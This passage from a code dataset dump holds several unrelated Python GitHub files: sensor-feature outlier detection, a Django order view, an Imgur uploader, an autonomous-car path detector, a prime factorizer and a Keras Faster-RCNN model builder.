open(filename, \"r\", encoding=\"UTF-8\")\r\n for line in f:\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if sensor not in self.use_classes:\r\n continue\r\n\r\n feature_dict[line[0].strip()] = {}\r\n for i in range(1, len(line)-1, 2):\r\n if line[i].strip() not in invalid:\r\n feature_dict[line[0].strip()][line[i]] = float(line[i+1])\r\n return feature_dict\r\n\r\n def remove_invalid_values(self, dict, invalid_list):\r\n print(\"removing invalid features\")\r\n #print(f\"invalid_list: {invalid_list}\")\r\n for invalid_feature in invalid_list:\r\n for sensor in dict:\r\n for el in dict[sensor]:\r\n el.pop(invalid_feature, None)\r\n return dict\r\n \r\n def dict_to_arrays(self, feature_dict, file_dict):\r\n \"\"\"Convertin to arrays\"\"\"\r\n features = [] #2d array\r\n target = [] #1d array that holds the corresponding classes\r\n file_list = []\r\n num = 0\r\n\r\n for sensor in feature_dict:\r\n\r\n for i in range(len(feature_dict[sensor])):\r\n tmp_lst = []\r\n file_list.append(file_dict[sensor][i])\r\n\r\n for feature in feature_dict[sensor][i]:\r\n tmp_lst.append(feature_dict[sensor][i][feature])\r\n features.append(tmp_lst)\r\n target.append(sensor)\r\n return np.array(features), np.array(target), np.array(file_list)\r\n \r\n def order_by_feat(self, features):\r\n dict = {}\r\n for sensor in features:\r\n for individual_sensor in features[sensor]: #This is a dict-element\r\n for feat in individual_sensor:\r\n if feat not in dict:\r\n dict[feat] = [individual_sensor[feat]]\r\n else: \r\n dict[feat].append(individual_sensor[feat])\r\n return dict \r\n \r\n\r\n def find_quartiles(self, grouped_dict):\r\n \"\"\"Takes in a dict grouped by features, return a dict by features with lower and upped limit\"\"\"\r\n bound_dict = {}\r\n for feat in grouped_dict: \r\n grouped_dict[feat].sort()\r\n tmp = grouped_dict[feat]\r\n lower_bound = math.floor(len(tmp) * 0.1)#Index for lower 25 % \r\n upper_bound = math.ceil(len(tmp) * 0.9) - 1#Index for the upper 75%\r\n iqr = 
tmp[upper_bound] - tmp[lower_bound] #Interquartile range \r\n min_outlier = tmp[lower_bound] - (1.5 * iqr)\r\n max_outlier = tmp[upper_bound] + (1.5 * iqr)\r\n bound_dict[feat] = [min_outlier, max_outlier]\r\n return bound_dict \r\n\r\n def identify_outliers(self, features, bound_dict):\r\n outliers = []\r\n for el in features:\r\n count = 0\r\n for feat in features[el]:\r\n if features[el][feat] <= bound_dict[feat][0] or features[el][feat] >= bound_dict[feat][1]:\r\n count += 1\r\n #print(\"count upped\")\r\n if count >= 275: #275 is used as deafult\r\n outliers.append(el.strip())\r\n return outliers\r\n \r\n def return_outliers(self, use_classes, total_invalid, short_files=[], filepath=\"comprehensive_features_10m_train.txt\"): #Use classes is a list consisting of the sensors you want to find outliers for\r\n self.use_classes = use_classes\r\n feat, invalid = self.read_features_from_file(filepath, inv_features=total_invalid)\r\n\r\n grouped = self.order_by_feat(feat)\r\n\r\n bound_dict = self.find_quartiles(grouped)\r\n\r\n train_feat = self.read_features_from_file2(filepath, invalid)\r\n\r\n outliers = self.identify_outliers(train_feat, bound_dict)\r\n #print(self.use_classes)\r\n #print(len(outliers))\r\n return outliers\r\n \r\n\r\nif __name__ == \"__main__\":\r\n iqr = IQR()\r\n\r\n #outliers = iqr.return_outliers(['Outside_Air_Temperature_Sensor'])\r\n\r\n #print(len(outliers))\r\n\r\n g1 = ['Outside_Air_Temperature_Sensor']\r\n g2 = ['Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor']\r\n g3 = ['Cooling_Valve', 'Reheat_Valve', 'Valve']\r\n g4 = ['Differential_Pressure_Sensor']\r\n g5 = ['Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor', ]\r\n g6 = ['Heat_Exchanger', 'Variable_Frequency_Drive']\r\n g7 = ['Return_Fan', 'Supply_Fan']\r\n g8 = ['Power_Sensor']\r\n g9 = ['Pump']\r\n g10 = ['Energy_Sensor']\r\n \r\n groupings = [g1, g2, g3, g4, g5, g6, g7, g8, g9, g10]\r\n outliers = []\r\n for i in range(len(groupings)):\r\n tmp = iqr.return_outliers(groupings[i], [])\r\n #print(f\"len {i}: {len(tmp)}\")\r\n outliers = outliers + tmp\r\n print(i)\r\n print(f\"len_outliers: {len(tmp)}\")\r\n print(tmp)\r\n\r\n print(len(outliers))","repo_name":"HavardRMinsas/Tag_Inference","sub_path":"IQR_outliers.py","file_name":"IQR_outliers.py","file_ext":"py","file_size_in_byte":8157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14640845326","text":"from django.shortcuts import render\nfrom .models import UserDeliveryInfo\nfrom .models import OrderedBookList\nfrom .models import Book\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\n\n\nclass Order(View):\n def get(self, request):\n ordered_book_lists = OrderedBookList.objects.all()\n book_lists = Book.objects.all()\n book_list = []\n for item in ordered_book_lists:\n if item.ordered_user_id == 'user1':\n book_list.append(item.ordered_book_id)\n for book in book_lists:\n if book.book_id == item.ordered_book_id:\n book_list.append(book)\n context = {\n 'book_list': book_list,\n }\n return render(request, 'prepare/order.html', context)\n\n def post(self, request):\n name = request.POST.get('user_name')\n phone = request.POST.get('user_phone')\n 
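`find_quartiles` above indexes the sorted values at the 10%/90% positions (despite the name) and widens them by 1.5 times the spread. An approximate numpy equivalent of that bound computation; the interpolation differs slightly from the original's floor/ceil indexing:

```python
import numpy as np

def outlier_bounds(values):
    lo, hi = np.percentile(values, [10, 90])   # ~ tmp[lower_bound], tmp[upper_bound]
    spread = hi - lo                           # the "iqr" variable above
    return lo - 1.5 * spread, hi + 1.5 * spread

print(outlier_bounds([1, 2, 3, 4, 5, 100]))    # (-75.0, 129.0) for this toy data
```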
address = request.POST.get('user_address')\n        message = False\n        if name and phone and address:\n            message = True\n            message = 'Your order has been placed, ' + name\n        context = {\n            'name': name,\n            'phone': phone,\n            'address': address,\n            'message': message,\n        }\n        return render(request, 'prepare/result.html', context)\n\n\n","repo_name":"idealization/Gojangnan-Aladin","sub_path":"Implement/2.Payment_System/develop/paymentPage/s-e/payment/prepare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"598631068","text":"import os\nimport shutil\n\nstring = 'hello_word_kappa_pride'\nprint(string.rfind('_'))\nprint(string[:string.rfind('_')])\n\npath_to_dataset = 'the-simpsons-characters-dataset\\\\kaggle_simpson_testset\\kaggle_simpson_testset'\nclasses = {}\n\nwith open('classes_threshold.txt', 'r') as file:\n    for character in file:\n        character = character.strip()\n        classes[character] = []\n\nfor image in os.listdir(path_to_dataset):\n    character = image[:image.rfind('_')]\n    classes[character].append(os.path.join(path_to_dataset, image))\n\nprint('classes number:', len(classes))\nprint('total images:', len(os.listdir(path_to_dataset)), '\\n')\nwith open('classes_threshold.txt', 'w') as file:\n    for character, counter in sorted(classes.items(), key=lambda x: len(x[1]), reverse=True):\n        print(character, '=', len(counter))\n        print(character, file=file)\n\n# waylon_smithers = 0\n# maggie_simpson = 0\n# groundskeeper_willie = 0\n# barney_gumble = 0\n# selma_bouvier = 0","repo_name":"NoVarlok/coursework-ML","sub_path":"create_test_dir.py","file_name":"create_test_dir.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"14356945497","text":"import os\nimport sys\n\nimport pyperclip\nfrom dotenv import load_dotenv\nfrom imgurpython import ImgurClient\n\nload_dotenv()\n\nclient_id = os.getenv(\"CLIENT_ID\")\nclient_secret = os.getenv(\"CLIENT_SECRET\")\n\n# Specify the image path\nargs = sys.argv\nimage_path = args[1]\n\nprint(\"image_path: \" + image_path)\n\nclient = ImgurClient(client_id, client_secret)\n\n# Upload the image\nprint(\"# uploading ...🔖\")\nimage = client.upload_from_path(image_path, config=None, anon=True)\n\n# Display the image link\nprint(\"# upload done✅\")\nprint(image[\"link\"])\npyperclip.copy(image[\"link\"])\nprint(\"クリップボード⌨にコピーしたーお㊢\")","repo_name":"EveSquare/-p-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"2189935473","text":"\"\"\"This is a simplistic Path Detector.\n\n   A Path Detector module is a python file that contains a `detect` function\n   that is capable of analyzing a binarized image in which non-zero pixels\n   indicate road boundaries. The analysis should identify the path (or,\n   multiple paths) to follow.\n\n   See the description of the `detect` function below for more details.\n\n   This Simplistic Path Detector implements a first crude idea to path\n   detection, and needs ample modification in order to obtain a working\n   prototype.\n\n   In this Simplistic Path Detector, a path is detected by sampling a single\n   row towards the bottom of the image. Non-zero pixels are identified to\n   infer the road boundaries; the line between the car center and the road\n   center is then calculated and used as the path to follow. 
\"\"\"\n\nimport logging\nimport numpy as np\nimport cv2\nimport time\nfrom scipy import ndimage\n\n\n# Log which path detector is being used. This appears in the output. Useful\n# for ensuring that the correct path detector is being used.\nlogging.info('Bacar0 ZEN is ready for departure')\n\n\ndef detect(mask):\n    \"\"\"This function receives a binarized image in its `mask` argument\n    (`mask` is a h x w numpy array where h is the height and w the width).\n    The non-zero pixels in the array encode road boundaries.\n\n    The task of this function is to analyze the mask, and identify the path\n    that the car should follow.\n\n    Returns: a tuple (dict, img) where:\n      `dict` is a dictionary that is transmitted to the state machine;\n          it should contain all the information that the state machine\n          requires to actuate the identified path(s).\n          Implementors are free to encode this information in the dictionary\n          in any way that they like. Of course, the state machine needs to\n          be written correspondingly to correctly decode the information.\n\n      `img` is optionally a numpy array (of the same width and height\n          as the mask) that visualizes the found path. Used for\n          visualization in the viewer only.\n    \"\"\"\n\n    img_height, img_width = mask.shape\n    x0 = int(img_width / 2)  # center of the image\n    # row to sample (first row at the top is row zero)\n    y0 = int(img_height*0.65)\n\n    # assume the car center is at coordinate (img_width/2, img_height)\n    car_center = (x0, img_height)\n\n    # ensure no obstacle is in front of the car. In order to do this, we take several\n    # points on the vertical line passing through the centre of the car and a couple\n    # to the left and the right of the car. This covers a greater area, so the\n    # possibility of the car swerving because of noise is low. These are marked\n    # in pink\n\n    dead_center = (int(img_width/2) , int(img_height/2) )\n    delta = 12 \n    ref0 = ( x0 , y0 )\n    ref1 = ( x0 , int(y0 - delta) )\n    ref2 = ( x0 , int(y0 - 1.5*delta))\n    ref3 = ( x0 , int(y0 - 2*delta))\n    ref4 = ( x0 , int(y0 - 2.5*delta))\n    ref5 = ( x0 , int(y0 - 3*delta))\n    ref6 = ( x0 , int(y0 - 4*delta))\n    ref7 = (int(x0 - delta) , int(y0 - delta) )\n    ref8 = (int(x0 + delta) , int(y0 - delta) )\n\n    ref_list = [ ref1 , ref2 , ref3 , ref4 , ref5, ref6 , ref7, ref8]\n    \n\n    # If the car approaches an obstacle, we must check the surroundings to the left\n    # and to the right. These points are marked yellow\n\n    left1 = ( int(x0-2.5*delta) , int(y0-delta) )\n    left2 = ( int(x0-2.5*delta) , int(y0-1.5*delta) )\n    left3 = ( int(x0-2.5*delta) , int(y0-2.5*delta) )\n    left4 = ( int(x0-3*delta) , int(y0-1.5*delta) )\n    left_list = [left1, left2, left3, left4 ]\n\n    right1 = ( int(x0+2.5*delta) , int(y0-delta) )\n    right2 = ( int(x0+2.5*delta) , int(y0-1.5*delta) )\n    right3 = ( int(x0+2.5*delta) , int(y0-2.5*delta) )\n    right4 = ( int(x0+3*delta) , int(y0-1.5*delta) )\n    right_list = [right1, right2, right3, right4 ]\n\n    #If the car approaches an intersection where it can go left or right, it will\n    #detect those directions and know it is possible to turn in that direction. To do\n    #so, a series of dots are marked in cyan on the bird's-eye view map and are used to tell\n    #whether those are non-zero.\n\n    cross1L = ( int(x0-3.4*delta) , int(y0-3*delta) )\n    cross2L = ( int(x0-3.6*delta) , int(y0-2.5*delta) )\n    cross3L = ( int(x0-3.9*delta) , int(y0-2*delta) )\n    cross4L = ( int(x0-3.6*delta) , int(y0-1.5*delta) )\n    cross5L = ( int(x0-3.4*delta) , int(y0-1*delta) )\n    cross6R = ( int(x0+3.4*delta) , int(y0-3*delta) )\n    cross7R = ( int(x0+3.6*delta) , int(y0-2.5*delta) )\n    cross8R = ( int(x0+3.9*delta) , int(y0-2*delta) )\n    cross9R = ( int(x0+3.6*delta) , int(y0-1.5*delta) )\n    cross10R = ( int(x0+3.4*delta) , int(y0-1*delta) )\n    cross_left=[cross1L,cross2L,cross3L,cross4L,cross5L]\n    cross_right = [cross6R, cross7R, cross8R, cross9R, cross10R ]\n    #A couple of points are used to predict the road far ahead. If the points are on \n    #the road (they are mostly zeros) then the car will continue ahead without\n    #interference\n\n    far1 = ( x0, 0 )\n    far2 = (int(x0-.8*delta), int(.5*delta) )\n    far3 = (int(x0+.8*delta), int(.5*delta) )\n    far4 = (int(x0-1.6*delta), int(delta))\n    far5 = (int(x0+1.6*delta), int(delta))\n    far_list = [far1, far2, far3, far4, far5 ]\n\n    #Verify that the car can turn left or right if the sign given by the path_detector says\n    #so\n    \n    left_o = 0\n    right_o= 0\n    clear_left = False\n    clear_right = False\n\n    for this in cross_left:\n        if int(mask[this[1]][this[0]]) == 0:\n            left_o = left_o + 1\n    for that in cross_right:\n        if int(mask[that[1]][that[0]]) == 0:\n            right_o = right_o + 1\n    \n\n    #First case: no obstacles found in front of the car: find the road centre and\n    #direct towards it\n    \n    obstacle_det = 0\n    for elem in ref_list:\n        if int(mask[elem[1]][elem[0]]) != 0:\n            obstacle_det = obstacle_det + 1\n\n    if left_o >= 4 and obstacle_det <= 3:\n        clear_left = True\n    if right_o >=4 and obstacle_det <= 3:\n        clear_right = True\n\n    if obstacle_det <= 3:\n    \n        far_obst = 0\n        for dot in far_list:\n            if int(mask[dot[1]][dot[0]]) != 0:\n                far_obst = far_obst + 1\n        \n        #If the road is straight as far as the camera can see, the car will go straight\n        if far_obst == 0:\n            \n            heading = 0\n            road_center = dead_center\n            path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n            path_img = np.zeros((img_height, img_width, 3), np.uint8)\n\n        else:\n\n            # try to find the road center by sampling the horizontal line passing\n            # through (x0,y0) -- find_center is a function defined further below\n            road_center = find_center(mask, x0, y0)\n\n            # calculate the angle between the vertical line that passes through\n            # the car center and the line that connects the car center with the road\n            # center -- model_to_heading is a function further defined below\n            heading = model_to_heading(road_center, car_center)\n\n            # send the calculated information to the state machine\n            # NOTE: one may want to extend the analysis and measure, e.g., how\n            # reliable the path is (in other words: how long one thinks one could\n            # follow it.) If this is measured one may also want to include it in\n            # this dictionary so that the state\n            # machine can use this.\n            path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n            \n            # uncomment the following line if you want to print the dictionary\n            # for debugging purposes\n            # logging.debug('returning %s' % str(path_dict))\n\n        # for debugging purposes, we visualize the above process\n        \n        # create a new image, of the same dimensions as mask, but colored\n        path_img = np.zeros((img_height, img_width, 3), np.uint8)\n\n        \n        \n    #If the car detects an obstacle, then it will use the yellow dots to guide itself: \n    #if the path is clear to the right, then it will go right. If the path is clear to\n    #the left, it will go left. \n    \n\n    elif obstacle_det > 3:\n\n        left_obst = 0\n        right_obst= 0\n        for point in left_list:\n            if int(mask[point[1]][point[0]]) != 0:\n                left_obst = left_obst + 1\n        for k in right_list:\n            if int(mask[k[1]][k[0]]) != 0:\n                right_obst = right_obst + 1\n        if right_obst < 2:\n            heading = -12\n        elif left_obst <2:\n            heading = 12\n        \n        \n\n    #If the car detects an obstacle and it can go neither left nor right, then it is \n    #a dead end and the car will turn around \n    \n        elif right_obst >= 2 and left_obst >= 2:\n            heading = 16\n\n        path_dict = {'heading': heading, 'car_center': car_center, 'clear_left': clear_left, 'clear_right': clear_right }\n        # create a new image, of the same dimensions as mask, but colored\n        path_img = np.zeros((img_height, img_width, 3), np.uint8)\n        road_center = ( 0, y0 )\n\n\n\n    # Draw a small filled dot at the car center, 4 pixels wide, in blue\n    cv2.circle(path_img, car_center, 4, (255, 0, 0), -1)\n\n    # Draw a green line to display the row that was sampled\n    cv2.line(path_img, (0, y0), (img_width, y0), (0, 255, 0))\n\n    # Draw a small filled dot at the calculated road center, 4 pixels wide,\n    # in red\n    cv2.circle(path_img, road_center, 4, (0, 0, 255), -1)\n\n    # Draw a small pink dot for each point used for obstacle detection\n\n    cv2.circle(path_img, ref0 , 3 , (180,105,255), -1)\n    cv2.circle(path_img, ref1 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref2 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref3 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref4 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref5 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref6 , 2 , (180,105,255), -1) \n    cv2.circle(path_img, ref7 , 2 , (180,105,255), -1)\n    cv2.circle(path_img, ref8 , 2 , (180,105,255), -1)\n    \n    # Draw a small yellow dot for each point used for emergency steering\n\n    cv2.circle(path_img, left1 , 2, (0,255,255), -1)\n    cv2.circle(path_img, left2 , 2, (0,255,255), -1)\n    cv2.circle(path_img, left3 , 2, (0,255,255), -1)\n    cv2.circle(path_img, left4 , 2, (0,255,255), -1)\n    cv2.circle(path_img, right1, 2, (0,255,255), -1)\n    cv2.circle(path_img, right2, 2, (0,255,255), -1)\n    cv2.circle(path_img, right3, 2, (0,255,255), -1)\n    cv2.circle(path_img, right4, 2, (0,255,255), -1)\n\n    #Draw a small cyan dot for every cross point used to detect 3 and 4 way crosses\n\n    cv2.circle(path_img, cross1L, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross2L, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross3L, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross4L, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross5L, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross6R, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross7R, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross8R, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross9R, 2, (255,255,0), -1)\n    cv2.circle(path_img, cross10R, 2, (255,255,0), -1)\n\n    #Draw a small red dot for every point used to detect the road far ahead \n\n    cv2.circle(path_img, far1, 2, (0,0,255), -1)\n    cv2.circle(path_img, far2, 2, (0,0,255), -1)\n    cv2.circle(path_img, far3, 2, (0,0,255), -1)\n    cv2.circle(path_img, far4, 2, (0,0,255), -1)\n    cv2.circle(path_img, far5, 2, (0,0,255), -1)\n\n\n    # Return the path dictionary and image. The path_dict will be sent\n    # to the state machine. The path_img is displayed in the viewer\n    return (path_dict, path_img)\n\n\ndef find_center(mask, x, y):\n    \"\"\"Sample the horizontal line passing through coordinate (x,y) for non-zero\n    pixels in mask to determine road center\"\"\"\n    img_height, img_width = mask.shape\n    sample_width = int(img_width / 2)\n    p0 = np.array([x, y])\n    pl = np.array([x-sample_width, y])\n    pr = np.array([x+sample_width, y])\n\n    # Take 60 samples on the left and 60 samples on the right\n    # profile is a function further defined below\n    xl, yl, l_val = profile(mask, p0, pl, 60)\n    xr, yr, r_val = profile(mask, p0, pr, 60)\n\n    # now analyze the sampling: find the first non-zero pixel in the samples\n    idx_l = np.nonzero(l_val)[0]\n    idx_r = np.nonzero(r_val)[0]\n\n    if idx_l.size == 0:\n        # No non-zero pixel was found on the left. This means that we don't\n        # see the left hand side of the road on row y0\n        # arbitrarily set the road boundary at x = x0 - 30\n        # this parameter value (30) likely needs to be tuned\n        contact_l = p0 + np.array([-30, 0])\n    else:\n        # Interpret the first non-zero pixel as the road boundary\n        contact_l = np.array([xl[idx_l[0]], yl[idx_l[0]]])\n\n    if idx_r.size == 0:\n        contact_r = p0 + np.array([30, 0])\n    else:\n        contact_r = np.array([xr[idx_r[0]], yr[idx_r[0]]])\n\n    # we define the road center to be mid-way between contact_l and contact_r\n    center = (contact_l + contact_r) / 2\n    return (int(center[0]), int(center[1]))\n\n\ndef model_to_heading(model_xy, car_center_xy):\n    \"\"\"Calculate the angle (in degrees) between the vertical line that\n    passes through the point `car_center_xy` and the line that connects\n    `car_center_xy` with `model_xy`.\n    A negative angle means that the car should turn clockwise; a positive\n    angle that the car should move counter-clockwise.\"\"\"\n    dx = 1. * model_xy[0] - car_center_xy[0]\n    dy = 1. * model_xy[1] - car_center_xy[1]\n\n    heading = -np.arctan2(dx, -dy)*180/np.pi\n\n    return heading\n\n\ndef profile(mask, p0, p1, num):\n    \"\"\"Takes `num` equidistant samples on the straight line between point `p0`\n    and point `p1` on binary image `mask`.\n\n    Here, points p0 and p1 are 2D points (x-coord,y-coord)\n\n    Returns: a triple (n, m, vals) where:\n      - n is a numpy array of size `num` containing the x-coordinates of\n        sampled points\n      - m is a numpy array of size `num` containing the y-coordinates of\n        sampled points\n      - vals is a numpy array of size `num` containing the sampled point\n        values, i.e. 
vals[i] = mask[m[i], n[i]]\n        (recall that images are indexed first on y-coordinate, then on\n        x-coordinate)\n    \"\"\"\n    n = np.linspace(p0[0], p1[0], num)\n    m = np.linspace(p0[1], p1[1], num)\n    return [n, m, ndimage.map_coordinates(mask, [m, n], order=0)]\n","repo_name":"Jvdelft/First-Year","sub_path":"Autonomous Car/Code/path_detector.py","file_name":"path_detector.py","file_ext":"py","file_size_in_byte":14622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"8853030566","text":"# Prime factorization\n\nN = int(input())\ni = 2\nwhile N != 1:\n    if N % i == 0:\n        N = N / i\n        print(i)\n    else:\n        i += 1\n\n# If it divides evenly, print the divisor. Otherwise increase the divisor by 1 and divide again. Some people solve this with a list, but this way seems better.\n","repo_name":"taehwan920/Algorithm","sub_path":"baekjoon/11653 factorization.py","file_name":"11653 factorization.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"28120177079","text":"from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input, Reshape,\n                                     TimeDistributed)\nfrom tensorflow.keras.models import Model\n\nfrom nets.resnet import ResNet50, classifier_layers\nfrom nets.RoiPoolingConv import RoiPoolingConv\n\n\n# Build the region proposal network (RPN)\n# Its output adjusts the anchor (prior) boxes to obtain proposal boxes\ndef get_rpn(base_layers, num_anchors):\n    '''\n    Build the rpn network\n    Parameters\n    ----------\n    base_layers: feature map output by resnet50 (None,38,38,1024)\n    num_anchors: number of anchor boxes, usually 9, i.e. each grid cell is assigned 9 anchors\n\n    Returns\n    -------\n\n    '''\n    # Integrate features with a 512-channel 3x3 convolution\n    x = Conv2D(512, (3, 3), padding='same', activation='relu',\n               kernel_initializer='normal', name='rpn_conv1')(base_layers)\n\n    # Adjust the channel count with a 1x1 convolution to obtain the predictions\n    # rpn_class only predicts whether an anchor box contains an object\n    anchors_class = Conv2D(num_anchors, (1, 1), activation='sigmoid',\n                           kernel_initializer='uniform', name='rpn_out_class')(x)\n    # Predict the offsets for each anchor box; the 4 values are the x, y, w, h adjustments\n    anchors_offset = Conv2D(num_anchors * 4, (1, 1), activation='linear',\n                            kernel_initializer='zero', name='rpn_out_regress')(x)\n\n    anchors_class = Reshape((-1, 1), name=\"classification\")(anchors_class)\n    anchors_offset = Reshape((-1, 4), name=\"regression\")(anchors_offset)\n\n    return [anchors_class, anchors_offset]\n\n\n# Feed the shared feature map and the proposal boxes into the classifier network\n# Its output adjusts the proposal boxes to obtain the predicted boxes\ndef get_classifier(base_layers, input_rois, nb_classes=21, pooling_regions=14):\n    '''\n    Faster-RCNN network model\n    Parameters\n    ----------\n    base_layers: feature map output by resnet50 (None,38,38,1024)\n    input_rois:\n    nb_classes\n    pooling_regions\n\n    Returns\n    -------\n\n    '''\n    # num_rois: number of proposal boxes per image\n    # num_rois, 38, 38, 1024 -> num_rois, 14, 14, 2048\n    out_roi_pool = RoiPoolingConv()([base_layers, input_rois, pooling_regions])\n    # out_roi_pool = RoiPoolingConv(pooling_regions)([base_layers, input_rois])\n    # num_rois, 14, 14, 1024 -> num_rois, 1, 1, 2048\n    out = classifier_layers(out_roi_pool)\n    # TimeDistributed: processes each element of the batch independently\n    # num_rois, 1, 1, 1024 -> num_rois, 2048\n    out = TimeDistributed(Flatten())(out)\n\n    # num_rois, 1, 1, 1024 -> num_rois, nb_classes\n    # (batch_size, num_rois, nb_classes), None: batch_size, num_rois: proposals per image, nb_classes: class predicted for each proposal\n    proposal_boxes_class = TimeDistributed(Dense(nb_classes,\n                                                 activation='softmax',\n                                                 kernel_initializer='zero'),\n                                           name=f'dense_class_{nb_classes}')(out)\n    # num_rois, 1, 1, 1024 -> num_rois, 4 * (nb_classes-1)\n    # (batch_size, num_rois, 4*(nb_classes-1)), 4*(nb_classes-1): the predicted box offsets for every class of each proposal; these offsets plus the proposal boxes give the predicted boxes
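A toy demonstration of the line-sampling trick `profile()` above builds on: `scipy.ndimage.map_coordinates` with `order=0` returns nearest-pixel values at the given (row, column) coordinates. The mask here is synthetic:

```python
import numpy as np
from scipy import ndimage

mask = np.zeros((5, 5), dtype=np.uint8)
mask[:, 3] = 255                   # a vertical "road boundary" at x = 3
n = np.linspace(0, 4, 5)           # x-coordinates of 5 samples
m = np.full(5, 2.0)                # sample along the row y = 2
vals = ndimage.map_coordinates(mask, [m, n], order=0)
print(vals)                        # [  0   0   0 255   0]
```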
\n    proposal_boxes_offset = TimeDistributed(Dense(4 * (nb_classes - 1),\n                                                  activation='linear',\n                                                  kernel_initializer='zero'),\n                                            name=f'dense_regress_{nb_classes}')(out)\n    return [proposal_boxes_class, proposal_boxes_offset]\n\n\ndef get_model(config, num_classes):\n    '''\n    Build the training network models\n    Parameters\n    ----------\n    config\n    num_classes\n\n    Returns\n    -------\n\n    '''\n    # Image input for the backbone feature extractor\n    inputs = Input(shape=(None, None, 3))\n    # Input of the roi-pooling layer: the final proposal boxes obtained from the rpn layer; None: number of proposals per image\n    roi_input = Input(shape=(None, 4))\n\n    # Assuming a 600,600,3 input,\n    # obtain a 38,38,1024 shared feature map base_layers\n    base_layers = ResNet50(inputs)\n\n    # 9 anchor boxes per feature point: number of anchor scales * number of aspect ratios\n    num_anchors = len(config.anchor_box_scales) * len(config.anchor_box_ratios)\n\n    # Feed the shared feature map into the proposal network\n    # Its output adjusts the anchor boxes to obtain proposal boxes\n    rpn = get_rpn(base_layers, num_anchors)\n    # This is a sub-network contained in model_all below; there is no need to train model_rpn separately, because\n    # training model_all updates model_rpn's weights in sync. model_rpn's job is to generate, at every training and\n    # prediction step, the proposal boxes used to crop the feature map. The weights are updated every batch,\n    # adjusting in the right direction, so the proposals become more and more accurate. Hmm, why does this suddenly remind me of GANs...\n    model_rpn = Model(inputs, rpn)\n\n    # Feed the shared feature map and the proposal boxes into the classifier network\n    # Its output adjusts the proposal boxes to obtain the predicted boxes\n    classifier = get_classifier(base_layers, roi_input, num_classes, config.pooling_regions)\n    # Build a model containing both the rpn and the classifier, trained together so that the combined loss of the two networks is minimized\n    model_all = Model([inputs, roi_input], rpn + classifier)\n\n    return model_rpn, model_all\n\n\ndef get_predict_model(config, num_classes):\n    '''\n    During training the two stages are trained together to minimize the total loss; for prediction they are split apart to speed up inference\n    Parameters\n    ----------\n    config\n    num_classes\n\n    Returns\n    -------\n\n    '''\n    # Image input for the backbone feature extractor\n    inputs = Input(shape=(None, None, 3))\n    # Input of the roi-pooling layer: the final proposal boxes obtained from the rpn layer; None: number of proposals per image\n    roi_input = Input(shape=(None, 4))\n    # Feature map output by the backbone; used as input to the classifier network at prediction time\n    feature_map_input = Input(shape=(None, None, 1024))\n\n    # Assuming a 600,600,3 input, obtain a 38,38,1024 shared feature map base_layers\n    base_layers = ResNet50(inputs)\n\n    # 9 anchor boxes per feature point\n    num_anchors = len(config.anchor_box_scales) * len(config.anchor_box_ratios)\n\n    # Feed the shared feature map into the proposal network\n    # Its output adjusts the anchor boxes to obtain proposal boxes\n    rpn = get_rpn(base_layers, num_anchors)\n    model_rpn = Model(inputs, rpn + [base_layers])\n\n    # Feed the shared feature map and the proposal boxes into the classifier network\n    # Its output adjusts the proposal boxes to obtain the predicted boxes\n    classifier = get_classifier(feature_map_input, roi_input, num_classes, config.pooling_regions)\n    # Only the classifier model is built here, unlike the model used during training\n    model_classifier_only = Model([feature_map_input, roi_input], classifier)\n\n    return model_rpn, model_classifier_only\n","repo_name":"yblir/faster-RCNN","sub_path":"nets/frcnn.py","file_name":"frcnn.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
